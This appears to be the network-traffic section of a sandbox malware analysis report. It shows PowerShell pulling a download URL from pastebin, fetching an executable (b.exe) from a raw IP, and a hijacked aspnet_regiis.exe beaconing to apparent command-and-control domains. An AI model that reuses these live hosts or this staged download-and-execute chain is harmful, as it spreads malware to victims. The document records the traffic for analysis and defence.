                                                                                                                                                          Nov 23, 2024 12:47:53.930401087 CET1.1.1.1192.168.2.40xd887No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:48:16.650183916 CET1.1.1.1192.168.2.40x81cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                          • pastebin.com
                                                                                                                                                          • revirepart.biz
                                                                                                                                                          • frogs-severz.sbs
                                                                                                                                                          • ipinfo.io
                                                                                                                                                          • api.telegram.org
                                                                                                                                                          • 192.81.132.76
                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.449734192.81.132.76807516C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Nov 23, 2024 12:47:14.100522995 CET68OUTGET /b.exe HTTP/1.1
                                                                                                                                                          Host: 192.81.132.76
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Nov 23, 2024 12:47:15.408783913 CET1236INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:15 GMT
                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                          Last-Modified: Fri, 22 Nov 2024 15:53:53 GMT
                                                                                                                                                          ETag: "af000-6278263cd54f1"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 716800
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 a8 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f2 01 00 00 fa 08 00 00 00 00 00 0a 60 0b 00 00 20 09 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 26 09 00 57 00 00 00 00 20 0b 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELr@g0` @ @&W @@` Hm@ka\ @.text `.rsrc@ @@.reloc@@B` `
                                                                                                                                                          Nov 23, 2024 12:47:15.408909082 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: 2OX.UO6d#~EC%#77G>2m\,FeO?k:C3frbu,7Y46cTJt2ufAS8+Rlk75
                                                                                                                                                          Nov 23, 2024 12:47:15.408962011 CET1236INData Raw: 36 82 84 90 41 b8 a3 74 d1 0e 94 75 d7 78 1d ed a4 1a 85 69 8b 7f 86 2a b9 3d d3 8d 22 64 9c 86 1b a8 89 36 b4 4d 62 60 93 34 b6 da 85 52 51 31 47 b5 3e 77 e3 29 9f 60 e5 2d 4f eb c5 70 1c ee 61 13 04 30 1d 19 81 0c 63 a7 8b 93 ea 89 df 9e 0f ae
                                                                                                                                                          Data Ascii: 6Atuxi*="d6Mb`4RQ1G>w)`-Opa0cG9(R=n#%<gBa"UL"m9)_S!y<6_$qE70O>ZAz_Xoib'27crootohzMurCS~
                                                                                                                                                          Nov 23, 2024 12:47:15.408998013 CET1236INData Raw: 08 78 7d 58 78 36 b2 08 a6 ba 33 46 85 7a 96 2a c2 08 c0 c1 93 39 6d 49 5b dd f6 54 14 ce 84 2a 58 6e f4 ae 1a a4 27 05 68 ea fb 69 14 0f ad 77 e2 cd 86 f4 f8 83 10 d7 ae 61 a5 15 f9 7f 7b 96 a2 75 41 f7 62 ab 0e 27 07 37 b9 e5 27 4d 5a 01 1b c5
                                                                                                                                                          Data Ascii: x}Xx63Fz*9mI[T*Xn'hiwa{uAb'7'MZ5q}8qcY$A1zKxF4|GZVD8D]^JA}_TJ7;|rqQf}_9Z#a16ByL6cUKk3w!~
                                                                                                                                                          Nov 23, 2024 12:47:15.409032106 CET1236INData Raw: b8 b8 30 a9 2e d6 df 3e 2c 98 0b 25 b2 87 c0 eb a7 ea 28 d8 b8 5c 22 f6 03 27 a3 43 14 48 05 67 22 44 7c 3c 92 11 9f 8e c8 16 8e 04 8f 71 c8 07 82 37 2c 47 d2 5f 11 2a 7f c9 2f 83 6e a7 35 4f 40 04 9d 04 88 0b e3 1e 8d 3e 68 1f 7e 2e 8b 5e a9 e7
                                                                                                                                                          Data Ascii: 0.>,%(\"'CHg"D|<q7,G_*/n5O@>h~.^w."7TYSSZ)4Q~fIw(~6>1t>_;R'bFJr$R&buv&VOH(gxzu}3(:!U4h+0s
                                                                                                                                                          Nov 23, 2024 12:47:15.409065008 CET1236INData Raw: fb 76 b8 0f 86 fc a1 96 50 10 67 7d 0a 1a 98 cc b3 fd 2c 2a 3d d3 38 4b 2d a6 36 d2 dc 8b 69 d5 8a d7 08 69 cd cf c1 96 81 70 2f 31 57 ff 70 04 64 a4 47 09 36 f4 38 5e e8 5b 9a 0e af 29 02 50 dc 6b 1b 2e 27 f1 2e 08 d1 ad 6a dd ad 84 76 5c ee 10
                                                                                                                                                          Data Ascii: vPg},*=8K-6iip/1WpdG68^[)Pk.'.jv\\:[i-j/pb[EY,ak2'x{eO3"*5U~[oxW39+.8'\F|j\bRLnhRK
                                                                                                                                                          Nov 23, 2024 12:47:15.409099102 CET1236INData Raw: e1 65 2c 1e bc e1 86 99 98 dd e1 6b dc 1e 6f 12 7a 8f b6 c4 7d a0 01 e2 87 70 8c 97 ed 82 9d d4 24 5f 8c aa c7 31 ec a9 76 c0 95 53 97 ee ff 3b 83 46 41 ed f4 a9 99 de 68 8b aa 5e cb 22 ab ae fb 9a b0 80 a6 7e 4b b1 33 41 f5 54 25 93 42 ad 22 12
                                                                                                                                                          Data Ascii: e,koz}p$_1vS;FAh^"~K3AT%B":@]y!~ 8*PP=F1Muy7W<,&15KSzYA9kyO~\bK:oocuuU%e:U@5"
                                                                                                                                                          Nov 23, 2024 12:47:15.409133911 CET1236INData Raw: e5 18 55 4a aa d7 33 72 a3 f9 bf 87 05 fe d3 81 15 05 cc 7f be 45 ce 96 d0 df b4 aa b9 4d b6 06 ce 96 cf cd a7 23 63 ea 3d 3f a2 9f 83 8e e2 17 9b 65 5a 50 07 ec d5 fd c1 58 96 2e 06 3c ef cd c6 d4 e9 5e ec ab 04 41 04 f7 0d d6 18 13 a7 63 3b fb
                                                                                                                                                          Data Ascii: UJ3rEM#c=?eZPX.<^Ac;aUP QL,uv0Yj(U'qe [Ng.hP/VS,iRM8]GcV=d/qZAlbu?2d
                                                                                                                                                          Nov 23, 2024 12:47:15.409166098 CET1236INData Raw: 9d 15 8e 41 90 fa 93 18 f1 55 fe 40 37 eb 6e 9d b9 2f 98 be a9 7d 72 78 c7 29 2f 9b d7 56 ac 94 f8 b0 cc 3f 2c 92 83 42 37 2c 99 75 04 1f f3 81 34 89 65 24 ac 36 b4 be 48 e5 72 d0 61 63 41 36 3e ca f5 c0 19 ce 68 8a f9 2e f2 21 a0 b7 79 39 01 ab
                                                                                                                                                          Data Ascii: AU@7n/}rx)/V?,B7,u4e$6HracA6>h.!y9[dO'#St0f~(g*$^mdXt| ak;DN8LfAsFj$)D\9.[*nft4|f;{%G+)j@9,>]2
                                                                                                                                                          Nov 23, 2024 12:47:15.409200907 CET1236INData Raw: 8e ea 2f 03 f0 4e 3c 0d 28 0f f8 a0 94 ff 44 f5 57 3f a2 4e 40 5d 02 68 cd 3d df fa 75 43 a7 51 fe 66 f3 31 48 83 48 73 3e cb 8b 84 ce 26 a7 0f 43 f2 b9 9f 88 73 b6 17 20 b8 14 e0 b5 74 e7 45 16 d6 10 9d 71 45 a0 d2 d1 34 fc 7e fe 85 17 51 d3 73
                                                                                                                                                          Data Ascii: /N<(DW?N@]h=uCQf1HHs>&Cs tEqE4~QsvsBxwg|]@vvE]a-2ZD,mVKf04Gs@#-brjR$';d"`xUxQptbL(~V-}K?e:F0?
                                                                                                                                                          Nov 23, 2024 12:47:15.528908014 CET1236INData Raw: 3a 35 d6 4d ee 00 86 b0 47 02 7a f9 05 c7 a8 86 64 1b 0e 5d 40 f1 b6 db 85 96 75 bd f3 ab 64 3c 8b cd 90 4b d6 6a 90 1a 4a b4 15 c0 d9 2c c3 ba 0a d2 dc 99 f1 e4 8c 51 62 de 6d 46 81 d7 13 15 93 aa 2b 58 0d 78 42 b1 50 53 bc e8 4f 50 35 1d 52 50
                                                                                                                                                          Data Ascii: :5MGzd]@ud<KjJ,QbmF+XxBPSOP5RPMe'3 HGh..+1DO3FhC\>0O+\>)I=T&o{5&.w\oV-0y^NG5z^U~}$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.449735192.81.132.76807664C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Nov 23, 2024 12:47:15.810266972 CET68OUTGET /b.exe HTTP/1.1
                                                                                                                                                          Host: 192.81.132.76
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Nov 23, 2024 12:47:17.080240011 CET1236INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:16 GMT
                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                          Last-Modified: Fri, 22 Nov 2024 15:53:53 GMT
                                                                                                                                                          ETag: "af000-6278263cd54f1"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 716800
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 a8 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f2 01 00 00 fa 08 00 00 00 00 00 0a 60 0b 00 00 20 09 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 26 09 00 57 00 00 00 00 20 0b 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELr@g0` @ @&W @@` Hm@ka\ @.text `.rsrc@ @@.reloc@@B` `
                                                                                                                                                          Nov 23, 2024 12:47:17.080307961 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: 2OX.UO6d#~EC%#77G>2m\,FeO?k:C3frbu,7Y46cTJt2ufAS8+Rlk75
                                                                                                                                                          Nov 23, 2024 12:47:17.080346107 CET1236INData Raw: 36 82 84 90 41 b8 a3 74 d1 0e 94 75 d7 78 1d ed a4 1a 85 69 8b 7f 86 2a b9 3d d3 8d 22 64 9c 86 1b a8 89 36 b4 4d 62 60 93 34 b6 da 85 52 51 31 47 b5 3e 77 e3 29 9f 60 e5 2d 4f eb c5 70 1c ee 61 13 04 30 1d 19 81 0c 63 a7 8b 93 ea 89 df 9e 0f ae
                                                                                                                                                          Data Ascii: 6Atuxi*="d6Mb`4RQ1G>w)`-Opa0cG9(R=n#%<gBa"UL"m9)_S!y<6_$qE70O>ZAz_Xoib'27crootohzMurCS~
                                                                                                                                                          Nov 23, 2024 12:47:17.080399990 CET1236INData Raw: 08 78 7d 58 78 36 b2 08 a6 ba 33 46 85 7a 96 2a c2 08 c0 c1 93 39 6d 49 5b dd f6 54 14 ce 84 2a 58 6e f4 ae 1a a4 27 05 68 ea fb 69 14 0f ad 77 e2 cd 86 f4 f8 83 10 d7 ae 61 a5 15 f9 7f 7b 96 a2 75 41 f7 62 ab 0e 27 07 37 b9 e5 27 4d 5a 01 1b c5
                                                                                                                                                          Data Ascii: x}Xx63Fz*9mI[T*Xn'hiwa{uAb'7'MZ5q}8qcY$A1zKxF4|GZVD8D]^JA}_TJ7;|rqQf}_9Z#a16ByL6cUKk3w!~
                                                                                                                                                          Nov 23, 2024 12:47:17.080432892 CET1236INData Raw: b8 b8 30 a9 2e d6 df 3e 2c 98 0b 25 b2 87 c0 eb a7 ea 28 d8 b8 5c 22 f6 03 27 a3 43 14 48 05 67 22 44 7c 3c 92 11 9f 8e c8 16 8e 04 8f 71 c8 07 82 37 2c 47 d2 5f 11 2a 7f c9 2f 83 6e a7 35 4f 40 04 9d 04 88 0b e3 1e 8d 3e 68 1f 7e 2e 8b 5e a9 e7
                                                                                                                                                          Data Ascii: 0.>,%(\"'CHg"D|<q7,G_*/n5O@>h~.^w."7TYSSZ)4Q~fIw(~6>1t>_;R'bFJr$R&buv&VOH(gxzu}3(:!U4h+0s
                                                                                                                                                          Nov 23, 2024 12:47:17.080466986 CET1236INData Raw: fb 76 b8 0f 86 fc a1 96 50 10 67 7d 0a 1a 98 cc b3 fd 2c 2a 3d d3 38 4b 2d a6 36 d2 dc 8b 69 d5 8a d7 08 69 cd cf c1 96 81 70 2f 31 57 ff 70 04 64 a4 47 09 36 f4 38 5e e8 5b 9a 0e af 29 02 50 dc 6b 1b 2e 27 f1 2e 08 d1 ad 6a dd ad 84 76 5c ee 10
                                                                                                                                                          Data Ascii: vPg},*=8K-6iip/1WpdG68^[)Pk.'.jv\\:[i-j/pb[EY,ak2'x{eO3"*5U~[oxW39+.8'\F|j\bRLnhRK
                                                                                                                                                          Nov 23, 2024 12:47:17.080499887 CET1236INData Raw: e1 65 2c 1e bc e1 86 99 98 dd e1 6b dc 1e 6f 12 7a 8f b6 c4 7d a0 01 e2 87 70 8c 97 ed 82 9d d4 24 5f 8c aa c7 31 ec a9 76 c0 95 53 97 ee ff 3b 83 46 41 ed f4 a9 99 de 68 8b aa 5e cb 22 ab ae fb 9a b0 80 a6 7e 4b b1 33 41 f5 54 25 93 42 ad 22 12
                                                                                                                                                          Data Ascii: e,koz}p$_1vS;FAh^"~K3AT%B":@]y!~ 8*PP=F1Muy7W<,&15KSzYA9kyO~\bK:oocuuU%e:U@5"
                                                                                                                                                          Nov 23, 2024 12:47:17.080533981 CET1236INData Raw: e5 18 55 4a aa d7 33 72 a3 f9 bf 87 05 fe d3 81 15 05 cc 7f be 45 ce 96 d0 df b4 aa b9 4d b6 06 ce 96 cf cd a7 23 63 ea 3d 3f a2 9f 83 8e e2 17 9b 65 5a 50 07 ec d5 fd c1 58 96 2e 06 3c ef cd c6 d4 e9 5e ec ab 04 41 04 f7 0d d6 18 13 a7 63 3b fb
                                                                                                                                                          Data Ascii: UJ3rEM#c=?eZPX.<^Ac;aUP QL,uv0Yj(U'qe [Ng.hP/VS,iRM8]GcV=d/qZAlbu?2d
                                                                                                                                                          Nov 23, 2024 12:47:17.080566883 CET1236INData Raw: 9d 15 8e 41 90 fa 93 18 f1 55 fe 40 37 eb 6e 9d b9 2f 98 be a9 7d 72 78 c7 29 2f 9b d7 56 ac 94 f8 b0 cc 3f 2c 92 83 42 37 2c 99 75 04 1f f3 81 34 89 65 24 ac 36 b4 be 48 e5 72 d0 61 63 41 36 3e ca f5 c0 19 ce 68 8a f9 2e f2 21 a0 b7 79 39 01 ab
                                                                                                                                                          Data Ascii: AU@7n/}rx)/V?,B7,u4e$6HracA6>h.!y9[dO'#St0f~(g*$^mdXt| ak;DN8LfAsFj$)D\9.[*nft4|f;{%G+)j@9,>]2
                                                                                                                                                          Nov 23, 2024 12:47:17.080604076 CET1236INData Raw: 8e ea 2f 03 f0 4e 3c 0d 28 0f f8 a0 94 ff 44 f5 57 3f a2 4e 40 5d 02 68 cd 3d df fa 75 43 a7 51 fe 66 f3 31 48 83 48 73 3e cb 8b 84 ce 26 a7 0f 43 f2 b9 9f 88 73 b6 17 20 b8 14 e0 b5 74 e7 45 16 d6 10 9d 71 45 a0 d2 d1 34 fc 7e fe 85 17 51 d3 73
                                                                                                                                                          Data Ascii: /N<(DW?N@]h=uCQf1HHs>&Cs tEqE4~QsvsBxwg|]@vvE]a-2ZD,mVKf04Gs@#-brjR$';d"`xUxQptbL(~V-}K?e:F0?
                                                                                                                                                          Nov 23, 2024 12:47:17.207199097 CET1236INData Raw: 3a 35 d6 4d ee 00 86 b0 47 02 7a f9 05 c7 a8 86 64 1b 0e 5d 40 f1 b6 db 85 96 75 bd f3 ab 64 3c 8b cd 90 4b d6 6a 90 1a 4a b4 15 c0 d9 2c c3 ba 0a d2 dc 99 f1 e4 8c 51 62 de 6d 46 81 d7 13 15 93 aa 2b 58 0d 78 42 b1 50 53 bc e8 4f 50 35 1d 52 50
                                                                                                                                                          Data Ascii: :5MGzd]@ud<KjJ,QbmF+XxBPSOP5RPMe'3 HGh..+1DO3FhC\>0O+\>)I=T&o{5&.w\oV-0y^NG5z^U~}$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.449730104.20.3.2354437516C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:11 UTC74OUTGET /raw/NQfY14gm HTTP/1.1
                                                                                                                                                          Host: pastebin.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-11-23 11:47:12 UTC388INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:12 GMT
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          x-frame-options: DENY
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-xss-protection: 1;mode=block
                                                                                                                                                          cache-control: public, max-age=1801
                                                                                                                                                          CF-Cache-Status: MISS
                                                                                                                                                          Last-Modified: Sat, 23 Nov 2024 11:47:12 GMT
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ec4d9d23c323-EWR
                                                                                                                                                          2024-11-23 11:47:12 UTC32INData Raw: 31 61 0d 0a 68 74 74 70 3a 2f 2f 31 39 32 2e 38 31 2e 31 33 32 2e 37 36 2f 62 2e 65 78 65 0d 0a
                                                                                                                                                          Data Ascii: 1ahttp://192.81.132.76/b.exe
                                                                                                                                                          2024-11-23 11:47:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.449731104.20.3.2354437516C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:13 UTC50OUTGET /raw/NQfY14gm HTTP/1.1
                                                                                                                                                          Host: pastebin.com
                                                                                                                                                          2024-11-23 11:47:13 UTC395INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:13 GMT
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          x-frame-options: DENY
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-xss-protection: 1;mode=block
                                                                                                                                                          cache-control: public, max-age=1801
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 1
                                                                                                                                                          Last-Modified: Sat, 23 Nov 2024 11:47:12 GMT
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ec5b387f80da-EWR
                                                                                                                                                          2024-11-23 11:47:13 UTC32INData Raw: 31 61 0d 0a 68 74 74 70 3a 2f 2f 31 39 32 2e 38 31 2e 31 33 32 2e 37 36 2f 62 2e 65 78 65 0d 0a
                                                                                                                                                          Data Ascii: 1ahttp://192.81.132.76/b.exe
                                                                                                                                                          2024-11-23 11:47:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.449732104.20.3.2354437664C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:13 UTC74OUTGET /raw/NQfY14gm HTTP/1.1
                                                                                                                                                          Host: pastebin.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-11-23 11:47:13 UTC395INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:13 GMT
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          x-frame-options: DENY
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-xss-protection: 1;mode=block
                                                                                                                                                          cache-control: public, max-age=1801
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 1
                                                                                                                                                          Last-Modified: Sat, 23 Nov 2024 11:47:12 GMT
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ec5b2db20f6b-EWR
                                                                                                                                                          2024-11-23 11:47:13 UTC32INData Raw: 31 61 0d 0a 68 74 74 70 3a 2f 2f 31 39 32 2e 38 31 2e 31 33 32 2e 37 36 2f 62 2e 65 78 65 0d 0a
                                                                                                                                                          Data Ascii: 1ahttp://192.81.132.76/b.exe
                                                                                                                                                          2024-11-23 11:47:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.449733104.20.3.2354437664C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:15 UTC50OUTGET /raw/NQfY14gm HTTP/1.1
                                                                                                                                                          Host: pastebin.com
                                                                                                                                                          2024-11-23 11:47:15 UTC395INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:15 GMT
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          x-frame-options: DENY
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-xss-protection: 1;mode=block
                                                                                                                                                          cache-control: public, max-age=1801
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 3
                                                                                                                                                          Last-Modified: Sat, 23 Nov 2024 11:47:12 GMT
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ec65ec2a0c86-EWR
                                                                                                                                                          2024-11-23 11:47:15 UTC32INData Raw: 31 61 0d 0a 68 74 74 70 3a 2f 2f 31 39 32 2e 38 31 2e 31 33 32 2e 37 36 2f 62 2e 65 78 65 0d 0a
                                                                                                                                                          Data Ascii: 1ahttp://192.81.132.76/b.exe
                                                                                                                                                          2024-11-23 11:47:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          4192.168.2.449741172.67.184.1744438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:25 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 8
                                                                                                                                                          Host: revirepart.biz
                                                                                                                                                          2024-11-23 11:47:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                          2024-11-23 11:47:26 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:25 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=9hs4k823ktjtlfcb3j4k9ffqmu; expires=Wed, 19 Mar 2025 05:34:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzpAKae7zpFHdaeZ6xNLjzKSLWMP3ZvvktOLcH%2BU0pVdHLGbylxHPZwq94wgq%2F2D2QymOtYfxBIzm7ErC0JUd2JDJb5Wbcm5VmjqhPjkn%2BBY2Z3ViyzhguNLK1BcWY9BmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70eca4ac830f7d-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1617&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1787025&cwnd=235&unsent_bytes=0&cid=12084ca3a8107136&ts=911&x=0"
                                                                                                                                                          2024-11-23 11:47:26 UTC9INData Raw: 34 0d 0a 66 61 69 6c 0d 0a
                                                                                                                                                          Data Ascii: 4fail
                                                                                                                                                          2024-11-23 11:47:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          5192.168.2.449744104.21.88.2504438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:27 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 8
                                                                                                                                                          Host: frogs-severz.sbs
                                                                                                                                                          2024-11-23 11:47:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                          2024-11-23 11:47:28 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:28 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
